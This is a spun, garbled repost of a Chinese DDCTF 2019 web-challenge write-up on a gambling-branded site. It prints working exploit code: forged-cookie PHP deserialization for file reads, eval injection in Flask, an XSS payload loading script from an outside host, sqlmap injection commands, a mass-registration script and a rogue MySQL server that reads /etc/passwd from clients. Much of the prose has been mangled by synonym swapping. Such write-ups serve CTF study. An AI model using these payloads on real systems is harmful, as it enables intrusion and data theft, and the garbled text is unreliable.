DDCTF 2019 Web WriteUp | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

DDCTF 2019 Web WriteUp

申博_安全防护 申博 142次浏览 未收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

滴~ 这是一道脑洞题。。。

背面的字符串,能够两次base64解码,一次url解码
DDCTF 2019 Web WriteUp
应该是文件包罗,写了个转换的小剧本

import binascii
import base64
filename = input().encode(encoding='utf-8')

hexstr = binascii.b2a_hex(filename)

base1 = base64.b64encode(hexstr)

base2 = base64.b64encode(base1)

print(base2.decode())

一最先我读的是php://filter/read=convert.base64-encode/resource=index.php,然则没有任何返回,因而我直接读了index.php,发明图片data的协定存在数据,复制图片链接base64解码

<?php
/*
 * https://blog.csdn.net/FengBanLiuYun/article/details/80616607
 * Date: July 4,2018
 */
error_reporting(E_ALL || ~E_NOTICE);


header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
echo '<title>'.$_GET['jpg'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';
$txt = base64_encode(file_get_contents($file));

echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
 * Can you find the flag file?
 *
 */

?>

这道题是有一个原题的,https://www.jianshu.com/p/6a64e8767f8f
从原题能够晓得这里是绕不外代码层面的,然则原题读取的是.idea文件夹,本题没有,然后这就是这道题最脑洞的处所,上面得CSDN的博客url是有作用的,并且第四行的日期和博文宣布的时刻不是对应的,须要去作者文章下这个日期的文章https://blog.csdn.net/FengBanLiuYun/article/details/80913909
在这篇文章里讲了vim的临时文件,并且文章提到了.practice.txt.swp这个文件,然后我试了半天swp,swo.swn,末了发明只要把前面的.去掉,接见http://117.51.150.246/practice.txt.swp
问题返回f1ag!ddctf.php,由于源码中会把config替代为!因而接见f1agconfigddctf.php编码情势再解码便可拿f1ag!ddctf.php源码

<?php
include('config.php');
$k = 'hello';
extract($_GET);
if(isset($uid))
{
    $content=trim(file_get_contents($k));
    if($uid==$content)
    {
        echo $flag;
    }
    else
    {
        echo'hello';
    }
}
?>

变量掩盖+php伪协定,?k=php://input&uid=1 post数据传1
DDCTF 2019 Web WriteUp

WEB 签到题

考点是反序列化
直接接见提醒没有接见权限,检察源代码,检察提议的收集要求发明了一个接口
DDCTF 2019 Web WriteUp
发明一个ddctf_username的header头,改成admin接见这个接口
DDCTF 2019 Web WriteUp
返回了一个文件名,接见返回了两个新文件的源代码

url:app/Application.php

<?php
Class Application {
    var $path = '';


    public function response($data, $errMsg = 'success') {
        $ret = ['errMsg' => $errMsg,
            'data' => $data];
        $ret = json_encode($ret);
        header('Content-type: application/json');
        echo $ret;

    }

    public function auth() {
        $DIDICTF_ADMIN = 'admin';
        if(!empty($_SERVER['HTTP_DIDICTF_USERNAME']) && $_SERVER['HTTP_DIDICTF_USERNAME'] == $DIDICTF_ADMIN) {
            $this->response('您以后以后权限为管理员----请接见:app/fL2XID2i0Cdh.php');
            return TRUE;
        }else{
            $this->response('歉仄,您没有上岸权限,请猎取权限后接见-----','error');
            exit();
        }

    }
    private function sanitizepath($path) {
    $path = trim($path);
    $path=str_replace('../','',$path);
    $path=str_replace('..\\','',$path);
    return $path;
}

public function __destruct() {
    if(empty($this->path)) {
        exit();
    }else{
        $path = $this->sanitizepath($this->path);
        if(strlen($path) !== 18) {
            exit();
        }
        $this->response($data=file_get_contents($path),'Congratulations');
    }
    exit();
}
}
?>



url:app/Session.php


<?php
include 'Application.php';
class Session extends Application {

    //key发起为8位字符串
    var $eancrykey                  = '';
    var $cookie_expiration          = 7200;
    var $cookie_name                = 'ddctf_id';
    var $cookie_path                = '';
    var $cookie_domain              = '';
    var $cookie_secure              = FALSE;
    var $activity                   = "DiDiCTF";


    public function index()
    {
    if(parent::auth()) {
            $this->get_key();
            if($this->session_read()) {
                $data = 'DiDI Welcome you %s';
                $data = sprintf($data,$_SERVER['HTTP_USER_AGENT']);
                parent::response($data,'sucess');
            }else{
                $this->session_create();
                $data = 'DiDI Welcome you';
                parent::response($data,'sucess');
            }
        }

    }

    private function get_key() {
        //eancrykey  and flag under the folder
        $this->eancrykey =  file_get_contents('../config/key.txt');
    }

    public function session_read() {
        if(empty($_COOKIE)) {
        return FALSE;
        }

        $session = $_COOKIE[$this->cookie_name];
        if(!isset($session)) {
            parent::response("session not found",'error');
            return FALSE;
        }
        $hash = substr($session,strlen($session)-32);
        $session = substr($session,0,strlen($session)-32);

        if($hash !== md5($this->eancrykey.$session)) {
            parent::response("the cookie data not match",'error');
            return FALSE;
        }
        $session = unserialize($session);


        if(!is_array($session) OR !isset($session['session_id']) OR !isset($session['ip_address']) OR !isset($session['user_agent'])){
            return FALSE;
        }

        if(!empty($_POST["nickname"])) {
            $arr = array($_POST["nickname"],$this->eancrykey);
            $data = "Welcome my friend %s";
            foreach ($arr as $k => $v) {
                $data = sprintf($data,$v);
            }
            parent::response($data,"Welcome");
        }

        if($session['ip_address'] != $_SERVER['REMOTE_ADDR']) {
            parent::response('the ip addree not match'.'error');
            return FALSE;
        }
        if($session['user_agent'] != $_SERVER['HTTP_USER_AGENT']) {
            parent::response('the user agent not match','error');
            return FALSE;
        }
        return TRUE;

    }

    private function session_create() {
        $sessionid = '';
        while(strlen($sessionid) < 32) {
            $sessionid .= mt_rand(0,mt_getrandmax());
        }

        $userdata = array(
            'session_id' => md5(uniqid($sessionid,TRUE)),
            'ip_address' => $_SERVER['REMOTE_ADDR'],
            'user_agent' => $_SERVER['HTTP_USER_AGENT'],
            'user_data' => '',
        );

        $cookiedata = serialize($userdata);
        $cookiedata = $cookiedata.md5($this->eancrykey.$cookiedata);
        $expire = $this->cookie_expiration + time();
        setcookie(
            $this->cookie_name,
            $cookiedata,
            $expire,
            $this->cookie_path,
            $this->cookie_domain,
            $this->cookie_secure
            );

    }
}


$ddctf = new Session();
$ddctf->index();
?>

代码逻辑大概是本身写了个客户端session,若是相符肯定规范则会反序列化要求的客户端session,Application的类的__destruct要领存在文件读取,传入的是path变量,111行存在反序列化操纵,以是path变量可控,连系便可恣意文件读取。然则要举行反序列化操纵必需过107层的MD5推断,然则$this->eancrykey不知,118行和121行能够经由过程花样化字符串读取$this->eancrykey,$_POST[“nickname”]传%s,如许第一次花样化%s照样被花样化为%s,第二次%s替代为$this->eancrykey
DDCTF 2019 Web WriteUp
拿到了$this->eancrykey,我们就能够捏造恣意客户端cookie,然后组织序列化字符串
须要注重的是,我们捏造的path变量必需为18为长度,并且代码会把../替代为空,解释提醒flag文件在统一目次,预测为../config/flag.txt
以是组织path为 …/./config/flag.txt,恰好替代后为flag地点,并且长度为18
exp:

<?php
Class Application {
    var $path = '';


    public function response($data, $errMsg = 'success') {
        $ret = ['errMsg' => $errMsg,
            'data' => $data];
        $ret = json_encode($ret);
        header('Content-type: application/json');
        echo $ret;

    }

    public function auth() {
        $DIDICTF_ADMIN = 'admin';
        if(!empty($_SERVER['HTTP_DIDICTF_USERNAME']) && $_SERVER['HTTP_DIDICTF_USERNAME'] == $DIDICTF_ADMIN) {
            $this->response('您以后以后权限为管理员----请接见:app/fL2XID2i0Cdh.php');
            return TRUE;
        }else{
            $this->response('歉仄,您没有上岸权限,请猎取权限后接见-----','error');
            exit();
        }

    }
    private function sanitizepath($path) {
    $path = trim($path);
    $path=str_replace('../','',$path);
    $path=str_replace('..\\','',$path);
    return $path;
    }

}
$class = unserialize(urldecode("a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a266d530ea78089fca551da75c2713a4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22222.18.127.50%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A73%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+WOW64%3B+rv%3A56.0%29+Gecko%2F20100101+Firefox%2F56.0%22%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D0d90002f458ae1d96eb1dffdc081c822"));
$app = new Application();
$secret = "EzblrbNS";
$app->path = "..././config/flag.txt";
array_push($class,$app);
var_dump(md5($secret.serialize($class)));
var_dump(urlencode(serialize($class)));

先将服务端返回的cookie反序列化,然后往数组增加一个捏造的Application类,掌握path参数,然后经由过程$this->eancrykey组织署名DDCTF 2019 Web WriteUp

homebrew event loop

这道题蛮有意思的,差点一血,被师傅抢先了一丢丢

DDCTF2019 两道WEB题解

前几天打了DDCTF,有几道WEB题还是挺不错的,在这里分析一下。 homebrew event loop 题目直接给了源码,是一道flask代码审计 # -*- encoding: utf-8 -*-
# written in python 2.7
__author__ = ‘garzon’

from flask import Flask, se

# -*- encoding: utf-8 -*-
# written in python 2.7
__author__ = 'garzon'


from flask import Flask, session, request, Response
import urllib

app = Flask(__name__)
app.secret_key = '*********************' # censored
url_prefix = '/d5af31f88147e857'

def FLAG():
    return 'FLAG_is_here_but_i_wont_show_you'  # censored

def trigger_event(event):
    session['log'].append(event)
    if len(session['log']) > 5: session['log'] = session['log'][-5:]
    if type(event) == type([]):
        request.event_queue += event
    else:
        request.event_queue.append(event)

def get_mid_str(haystack, prefix, postfix=None):
    haystack = haystack[haystack.find(prefix)+len(prefix):]
    if postfix is not None:
        haystack = haystack[:haystack.find(postfix)]
    return haystack

class RollBackException: pass

def execute_event_loop():
    valid_event_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789:;#')
    resp = None
    while len(request.event_queue) > 0:
        event = request.event_queue[0] # `event` is something like "action:ACTION;ARGS0#ARGS1#ARGS2......"
        request.event_queue = request.event_queue[1:]
        if not event.startswith(('action:', 'func:')): continue
        for c in event:
            if c not in valid_event_chars: break
        else:
            is_action = event[0] == 'a'
            action = get_mid_str(event, ':', ';')
            args = get_mid_str(event, action+';').split('#')
            try:
                event_handler = eval(action + ('_handler' if is_action else '_function'))
                ret_val = event_handler(args)
            except RollBackException:
                if resp is None: resp = ''
                resp += 'ERROR! All transactions have been cancelled. <br />'
                resp += '<a href="./?action:view;index">Go back to index.html</a><br />'
                session['num_items'] = request.prev_session['num_items']
                session['points'] = request.prev_session['points']
                break
            except Exception, e:
                if resp is None: resp = ''
                #resp += str(e) # only for debugging
                continue
            if ret_val is not None:
                if resp is None: resp = ret_val
                else: resp += ret_val
    if resp is None or resp == '': resp = ('404 NOT FOUND', 404)
    session.modified = True
    return resp

@app.route(url_prefix+'/')
def entry_point():
    querystring = urllib.unquote(request.query_string)
    request.event_queue = []
    if querystring == '' or (not querystring.startswith('action:')) or len(querystring) > 100:
        querystring = 'action:index;False#False'
    if 'num_items' not in session:
        session['num_items'] = 0
        session['points'] = 3
        session['log'] = []
    request.prev_session = dict(session)
    trigger_event(querystring)
    return execute_event_loop()

# handlers/functions below --------------------------------------

def view_handler(args):
    page = args[0]
    html = ''
    html += '[INFO] you have {} diamonds, {} points now.<br />'.format(session['num_items'], session['points'])
    if page == 'index':
        html += '<a href="./?action:index;True%23False">View source code</a><br />'
        html += '<a href="./?action:view;shop">Go to e-shop</a><br />'
        html += '<a href="./?action:view;reset">Reset</a><br />'
    elif page == 'shop':
        html += '<a href="./?action:buy;1">Buy a diamond (1 point)</a><br />'
    elif page == 'reset':
        del session['num_items']
        html += 'Session reset.<br />'
    html += '<a href="./?action:view;index">Go back to index.html</a><br />'
    return html

def index_handler(args):
    bool_show_source = str(args[0])
    bool_download_source = str(args[1])
    if bool_show_source == 'True':

        source = open('eventLoop.py', 'r')
        html = ''
        if bool_download_source != 'True':
            html += '<a href="./?action:index;True%23True">Download this .py file</a><br />'
            html += '<a href="./?action:view;index">Go back to index.html</a><br />'

        for line in source:
            if bool_download_source != 'True':
                html += line.replace('&','&amp;').replace('\t', '&nbsp;'*4).replace(' ','&nbsp;').replace('<', '&lt;').replace('>','&gt;').replace('\n', '<br />')
            else:
                html += line
        source.close()

        if bool_download_source == 'True':
            headers = {}
            headers['Content-Type'] = 'text/plain'
            headers['Content-Disposition'] = 'attachment; filename=serve.py'
            return Response(html, headers=headers)
        else:
            return html
    else:
        trigger_event('action:view;index')

def buy_handler(args):
    num_items = int(args[0])
    if num_items <= 0: return 'invalid number({}) of diamonds to buy<br />'.format(args[0])
    session['num_items'] += num_items 
    trigger_event(['func:consume_point;{}'.format(num_items), 'action:view;index'])

def consume_point_function(args):
    point_to_consume = int(args[0])
    if session['points'] < point_to_consume: raise RollBackException()
    session['points'] -= point_to_consume

def show_flag_function(args):
    flag = args[0]
    #return flag # GOTCHA! We noticed that here is a backdoor planted by a hacker which will print the flag, so we disabled it.
    return 'You naughty boy! ;) <br />'

def get_flag_handler(args):
    if session['num_items'] >= 5:
        trigger_event('func:show_flag;' + FLAG()) # show_flag_function has been disabled, no worries
    trigger_event('action:view;index')

if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0')

重要问题是46行,eval函数存在注入,能够经由过程#解释,我们能够传入路由action:eval#;arg1#arg2#arg3如许解释背面语句并能够挪用恣意函数,分号背面的#为传入参数,参数经由过程#被分割为参数列表
因而能够挪用trigger_event函数,并且该函数参数能够为列表,挪用trigger_event,能够发明trigger_event的参数照旧为函数,传入的函数名会被传入事宜列表以后在事宜轮回中被实行,以是挪用trigger_event并传入其他函数的话就相当于我们能够实行多个函数,起首实行buy_handler(5),再实行get_flag_handler(),就能够绕过session[‘num_items’] >= 5的推断,然后flag会被通报到trigger_event函数并且被写入session[‘log’],要注重实行buy_handler函数后事宜列表末端会到场consume_point_function函数,在末了实行此函数时校验会失利,抛出RollBackException()非常,然则不会影响session的返回(做题时认为非常不会返回session想了良久)。然后再用p师傅的剧本解密session便可拿flag
exp:
DDCTF 2019 Web WriteUp

DDCTF 2019 Web WriteUp

Upload-IMG

接见后能够上传图片,一最先上传会问题会提醒须要包罗phpinfo()字符串,然则到场字符串后上传照旧提醒未包罗,下载下上传后的图片,hex检察发明经过了php-gd库衬着,我们到场的字符串在衬着的时刻被删除。上网搜刮的时刻发明了一个对象
https://wiki.ioin.in/soft/detail/1q
能够用这个对象天生能够GD衬着处置惩罚后,依旧能保存字符串的jpg,在py源码中把字符串改成phpinfo(),然后天生。然则一向失利,背面在这篇文章发明实在要看脸
https://paper.seebug.org/387/#2-php-gdwebshell
DDCTF 2019 Web WriteUp<
猖獗找图片,找了快100张了,然后在我用我博客的一张背景图的时刻终究胜利了
DDCTF 2019 Web WriteUp

迎接报名DDCTF

太脑洞了,太脑洞了,太脑洞了
一向认为是sql,直到用xss的exp发明有bot要求
在报名页面的备注里只对sql举行一点过滤,然则xss没有任何过滤,直接<script src=//xxxx></script>便可
经由过程xss平台读页面源码读到一个接口
DDCTF 2019 Web WriteUp
http://117.51.147.2/Ze02pQYLf5gGNyMn/query_aIeMu0FUoVrW0NWPHbN6z4xh.php?id=
测了半天注入照样没器械,效果一堆人做出来后从新复测,注重到返转头GBK
DDCTF 2019 Web WriteUp
然后就是宽字节注入
SQLmap加tamper都能够跑

#一切数据库名
python2 sqlmap.py -u "http://117.51.147.2/Ze02pQYLf5gGNyMn/query_aIeMu0FUoVrW0NWPHbN6z4xh.php?id=1" --tamper unmagicquotes --dbs --hex

#数据库表名
python2 sqlmap.py -u "http://117.51.147.2/Ze02pQYLf5gGNyMn/query_aIeMu0FUoVrW0NWPHbN6z4xh.php?id=1" --tamper unmagicquotes --hex -D "ctfdb" --tables

#字段名
python2 sqlmap.py -u "http://117.51.147.2/Ze02pQYLf5gGNyMn/query_aIeMu0FUoVrW0NWPHbN6z4xh.php?id=1" --tamper unmagicquotes --hex -D "ctfdb" -T "ctf_fhmHRPL5" --columns

#flag
python2 sqlmap.py -u "http://117.51.147.2/Ze02pQYLf5gGNyMn/query_aIeMu0FUoVrW0NWPHbN6z4xh.php?id=1" --tamper unmagicquotes --hex --sql-shell
sql-shell> select ctf_value from ctfdb.ctf_fhmHRPL5;

通例操纵,注库名,表名,字段名(TCL)做的时刻想的太庞杂了,然则我的sqlmap末了这里不克不及直接–dump,以是我实行了–sql-shell自定义sql敕令终究拿的flag
sqlmap宽字节注入自带的tamper是unmagicquotes
这里由于过滤了单引号,以是我们须要用–hex参数将字符串转为0x开首的16进制数字避开引号
DDCTF 2019 Web WriteUp

大吉大利,今晚吃鸡~

cookie发明是go的框架,买器械追念起了护网杯的溢出,能够参考这篇文章
https://evoa.me/index.php/archives/4/
溢出了一下昼,末了迥殊脑洞发明要用Go的无标记32位整形来溢出,42949672961,购置胜利,然后返回了一个id和token,然后能够最先经由过程输入id和token镌汰选手,然则返回返来的id和token是本身的,并不克不及本身镌汰本身
DDCTF 2019 Web WriteUp
DDCTF 2019 Web WriteUp
这个时刻倏忽脑洞大开,注册小号,购置入场券,然后镌汰小号的id和token发明胜利
然后批量注册小号批量买入场券批量拿id和token给大号镌汰
我的剧本:

import requests
import time
for i in range(0,1000):
    print(i)
    url1 = "http://117.51.147.155:5050/ctf/api/register?name=evoa0{0}&password=xxxxxxxxxxxx".format(str(i))
    url2 = "http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=42949672961"
    url3 = "http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id="
    url4 = "http://117.51.147.155:5050/ctf/api/remove_robot?ticket={0}&id={1}"
    rep1 = requests.get(url1)

    cook1name = rep1.cookies["user_name"]
    cook1sess = rep1.cookies["REVEL_SESSION"]
    urlcookies={"user_name":cook1name,"REVEL_SESSION":cook1sess}

    rep2 = requests.get(url2,cookies=urlcookies)
    billid = rep2.json()['data'][0]["bill_id"]

    rep3 = requests.get(url3+billid,cookies=urlcookies)
    userid = rep3.json()['data'][0]["your_id"]
    userticket = rep3.json()['data'][0]["your_ticket"]
    time.sleep(1)
    rep4 = requests.get(url4.format(userticket,str(userid)),cookies={"user_name":"evoA002","REVEL_SESSION":"675dc6a259890db618c598e0cd9f9802"})
    print(url4.format(userticket,str(userid)))
    with open("chicken.txt","a") as txt:
        txt.write(str(userid) + ":" +userticket)
        txt.write("\n")

然则每次注册的小号不肯定能胜利,并且镌汰到后期id和token反复率会很高效力会很低,看脸了,滴滴会限定接见频次以是剧本sleep了一秒,但我还用了vps来协助跑以是照样比较快的,差不多半个小时不到就吃鸡了
DDCTF 2019 Web WriteUp

mysql弱口令

一看到问题形貌就想到了mysql服务端捏造
https://xz.aliyun.com/t/3277
然后网上找了个py剧正本捏造
https://www.cnblogs.com/apossin/p/10127496.html

#coding=utf-8 
import socket
import logging
logging.basicConfig(level=logging.DEBUG)

filename="/etc/passwd"
sv=socket.socket()
sv.bind(("",3306))
sv.listen(5)
conn,address=sv.accept()
logging.info('Conn from: %r', address)
conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
conn.recv(9999)
logging.info("auth okay")
conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
conn.recv(9999)
logging.info("want file...")
wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename
conn.sendall(wantfile)
content=conn.recv(9999)
logging.info(content)
conn.close()

问题起首会给你一个agent.py,看源码晓得这是一个考证服务端有无运转mysql历程的文件,agent.py会运用8213端口,挪用netstat -plnt敕令检察历程和端口并返回给http要求,问题服务器先会要求你的vps上8123端口来考证是不是开启mysql历程,以是直接把输出改成mysql的历程就能够绕过
result = [{‘local_address’:”0.0.0.0:3306″,”Process_name”:”1234/mysqld”}]
运转上面的py就能够读文件了,问题表单输入的是你的vps地点和mysql端口
DDCTF 2019 Web WriteUp
然后猖獗读文件,读了一下昼啥都没有,读数据库文件发明只要字段和表名没有flag,背面想到有个/root/.mysql_history文件,实验读取
DDCTF 2019 Web WriteUp
就出flag了
不外这个彷佛黑白预期解,正解应该是读取idb文件。并且读取了一下.bash_history和.viminfo文件另有新的收成,这个问题服务器上还运转着吃鸡的问题情况,还能够读取吃鸡的问题源码,flag高高的挂在内里。。

.NET高级代码审计(第四课) JavaScriptSerializer反序列化漏洞

作者: Ivan1ee@360云影实验室 0X00 前言 在.NET处理 Ajax应用的时候,通常序列化功能由JavaScriptSerializer类提供,它是.NET2.0之后内部实现的序列化功能的类,位于命名空间System.Web.Script.Serialization、通过System.Web.Extensions


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明DDCTF 2019 Web WriteUp
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址